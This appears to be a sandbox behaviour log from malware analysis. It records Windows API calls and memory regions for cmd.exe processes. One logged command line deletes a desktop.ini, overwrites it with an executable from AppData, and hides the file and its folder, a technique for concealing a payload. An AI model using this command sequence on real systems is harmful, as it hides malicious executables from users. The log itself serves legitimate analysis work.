[0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] GetFileType (hFile=0x4c) returned 0x1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] GetFileType (hFile=0x4c) returned 0x1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] GetFileType (hFile=0x4c) returned 0x1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.918] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.918] GetFileType (hFile=0x4c) returned 0x1 [0131.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.918] GetFileType (hFile=0x4c) returned 0x1 [0131.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.918] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.918] GetFileType (hFile=0x4c) returned 0x1 [0131.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.918] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.918] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.919] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.919] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] GetFileType (hFile=0x4c) returned 0x1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] GetFileType (hFile=0x4c) returned 0x1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] GetFileType (hFile=0x4c) returned 0x1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] GetFileType (hFile=0x4c) returned 0x1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] GetFileType (hFile=0x4c) returned 0x1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.920] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.920] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.921] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.921] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] GetFileType (hFile=0x4c) returned 0x1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] GetFileType (hFile=0x4c) returned 0x1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] GetFileType (hFile=0x4c) returned 0x1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] GetFileType (hFile=0x4c) returned 0x1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] GetFileType (hFile=0x4c) returned 0x1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] GetFileType (hFile=0x4c) returned 0x1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] GetFileType (hFile=0x4c) returned 0x1 [0131.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] GetFileType (hFile=0x4c) returned 0x1 [0131.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.922] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.922] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.922] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.922] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x32, lpOverlapped=0x0) returned 1 [0131.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] GetFileType (hFile=0x4c) returned 0x1 [0131.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] GetFileType (hFile=0x4c) returned 0x1 [0131.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x32, lpOverlapped=0x0) returned 1 [0131.922] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.922] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.922] _close (_FileHandle=4) returned 0 [0131.923] FindNextFileW (in: hFindFile=0x3f0e90, lpFindFileData=0x2cf134 | out: lpFindFileData=0x2cf134) returned 0 [0131.923] GetLastError () returned 0x12 [0131.923] FindClose (in: hFindFile=0x3f0e90 | out: hFindFile=0x3f0e90) returned 1 [0131.923] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0131.924] _close (_FileHandle=3) returned 0 [0131.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.924] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.924] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.924] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.924] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.924] SetConsoleInputExeNameW () returned 0x1 [0131.924] GetConsoleOutputCP () returned 0x1b5 [0131.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.924] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.925] exit (_Code=0) Process: id = "111" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xaa4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12069 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12070 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12071 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12072 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12073 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12074 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12075 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12076 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12077 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 12078 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12171 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12172 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12173 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12174 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 12175 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 12176 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12177 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12178 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12179 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12180 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12181 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12182 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12183 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12184 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12185 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12186 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12187 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12188 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 12189 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 12190 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12191 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 12192 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 12193 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 12194 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 12243 start_va = 0x13a0000 end_va = 0x166efff entry_point = 0x13a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 168 os_tid = 0xaa0 [0131.801] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf8cc | out: lpSystemTimeAsFileTime=0x2cf8cc*(dwLowDateTime=0x887ef7a0, dwHighDateTime=0x1d440a9)) [0131.801] GetCurrentProcessId () returned 0xaa4 [0131.801] GetCurrentThreadId () returned 0xaa0 [0131.801] GetTickCount () returned 0x29fc7 [0131.801] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf8c4 | out: lpPerformanceCount=0x2cf8c4*=18859058747) returned 1 [0131.802] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0131.802] __set_app_type (_Type=0x1) [0131.802] __p__fmode () returned 0x76b331f4 [0131.802] __p__commode () returned 0x76b331fc [0131.802] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0131.802] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0131.802] GetCurrentThreadId () returned 0xaa0 [0131.802] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaa0) returned 0x38 [0131.802] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.802] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0131.802] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.803] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.803] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf85c | out: phkResult=0x2cf85c*=0x0) returned 0x2 [0131.803] VirtualQuery (in: lpAddress=0x2cf893, lpBuffer=0x2cf82c, dwLength=0x1c | out: lpBuffer=0x2cf82c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.803] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf82c, dwLength=0x1c | out: lpBuffer=0x2cf82c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.803] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf82c, dwLength=0x1c | out: lpBuffer=0x2cf82c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.803] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf82c, dwLength=0x1c | out: lpBuffer=0x2cf82c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.803] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf82c, dwLength=0x1c | out: lpBuffer=0x2cf82c*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xd0000, State=0x10000, Protect=0x1, 